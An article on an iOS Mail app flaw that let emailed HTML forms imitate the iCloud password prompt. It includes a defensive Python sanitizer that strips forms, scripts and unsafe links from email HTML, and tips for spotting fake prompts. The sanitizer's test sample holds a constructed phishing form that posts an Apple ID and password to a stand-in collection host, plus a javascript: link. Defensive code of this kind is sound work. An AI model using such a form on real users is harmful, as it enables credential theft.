Apple’s iCloud platform is a very popular feature, letting you share photos, music, data and your location between all of your devices. A bug in the iOS Mail app could hand all of that personal information to strangers who could use it for their own purposes. All that is required to gain access is your iCloud email address and password.
It is not uncommon for your iPhone to occasionally display a prompt asking for these credentials. Unfortunately, someone has found a way to exploit this through the built-in Mail app. The would-be phishing scam takes advantage of the Mail app’s failure to properly strip harmful HTML from incoming email. Using HTML and CSS (two of the most common web languages), a sender can build a form that looks identical to the iOS authentication window, and anything typed into it is sent back to the person who sent the email. Jan Soucek, a security researcher based in Prague, discovered the bug in Apple’s Mail app and alerted Apple to its potential for abuse in January. Apple has since issued an update to the iPhone operating system; however, this vulnerability remains. When Soucek realized the vulnerability had not been fixed, he published the code. His code displays the authentication window only once, reducing suspicion. Apple has always taken steps to improve security, and will no doubt make the necessary improvements to ensure that this doesn’t affect anyone, especially given the media attention this issue is receiving.
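The root cause described above is a mail client rendering HTML that can collect and submit input. The sanitizer below is an added example, not Apple’s code or Soucek’s, showing the defensive side: an HTML email body is parsed with Python’s standard `html.parser`, and any element that can build a form, submit input or run active content (the tag sets `DROP_WITH_CONTENT` and `DROP_VOID`, inline `on*` handlers and non-http link schemes) is removed before the message is shown, while a list of what was stripped is returned so the client can log or flag the message. The sample email and the `phishing.example` host in it are constructed for the test; the policy sets are assumptions for this example rather than any client’s actual rules.

```python
import html
from html.parser import HTMLParser

# Constructed policy for this example (an assumption, not any real client's rules).
# Elements that collect or submit input, or load active/remote content, are dropped
# together with their contents; void elements are dropped outright.
DROP_WITH_CONTENT = {"form", "button", "select", "textarea", "script",
                     "iframe", "object", "style", "noscript"}
DROP_VOID = {"input", "meta", "link", "embed", "base"}
URL_ATTRS = {"href", "src"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


class EmailHtmlSanitizer(HTMLParser):
    """Rewrite an HTML e-mail body so that nothing in it can render an input
    form or run script, and remember what was removed for logging."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []        # cleaned output fragments
        self.skipping = []   # stack of dropped container tags we are inside
        self.removed = []    # names of stripped tags ("form") and attributes ("@onclick")

    def _clean_attrs(self, attrs):
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):            # inline event handlers
                self.removed.append(f"@{name}")
                continue
            if name in URL_ATTRS:
                target = (value or "").strip().lower()
                if not target.startswith(SAFE_URL_SCHEMES):   # javascript:, data:, ...
                    self.removed.append(f"@{name}")
                    continue
            kept.append((name, value))
        return kept

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if self.skipping:                        # inside a dropped container
            if tag in DROP_WITH_CONTENT:
                self.skipping.append(tag)        # track nesting so we pop correctly
            return
        if tag in DROP_WITH_CONTENT:
            self.skipping.append(tag)
            self.removed.append(tag)
            return
        if tag in DROP_VOID:
            self.removed.append(tag)
            return
        parts = []
        for name, value in self._clean_attrs(attrs):
            if value is None:
                parts.append(f" {name}")
            else:
                parts.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(parts)}>")

    def handle_startendtag(self, tag, attrs):
        # Self-closing syntax such as <br/>: emit the start tag only.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        tag = tag.lower()
        if self.skipping:
            if tag == self.skipping[-1]:
                self.skipping.pop()
            return
        if tag in DROP_VOID or tag in DROP_WITH_CONTENT:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(data)

    def handle_entityref(self, name):           # keep text entities escaped as written
        if not self.skipping:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skipping:
            self.out.append(f"&#{name};")


def sanitize_email_html(body):
    """Return (cleaned_html, removed_items) for an HTML e-mail body."""
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample: a message carrying a credential form styled to look like
# a system prompt, plus a javascript: link. Not a real message.
SAMPLE_EMAIL = (
    '<p>Your account needs verification.</p>'
    '<form action="https://phishing.example/collect" method="post">'
    'Apple ID <input name="u"> Password <input type="password" name="p">'
    '<button>Sign In</button></form>'
    '<a href="javascript:alert(1)" onclick="x()">Continue</a>'
    '<p>Thanks &amp; regards</p>'
)

if __name__ == "__main__":
    cleaned, removed = sanitize_email_html(SAMPLE_EMAIL)
    print(cleaned)
    print("stripped:", removed)
```

A non-empty `removed` list is itself a useful signal: a mail client or gateway can treat a message that tried to deliver a `form` as suspicious and warn the user, rather than silently rendering a cleaned version.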
Here is the video: “Proof-of-concept: iOS 8.3 Mail.app attack”
As bad as it may seem, this bug in the iOS Mail app is not the worst thing that can happen to you, and there are steps you can take to protect yourself. If you see a credential prompt, press Cancel and then the Home button: a fake authentication window will not reappear, while a legitimate one will. If the authentication window has predictive text above the keyboard, it is not a real one, because predictive text is disabled for secure windows in iOS. Another thing to look for is a “GO” button on the keyboard, which indicates a web form being submitted.
As with everything, you must be aware of your environment. Whether you are walking down the street or reading your email, being aware of your surroundings will help you stay safe.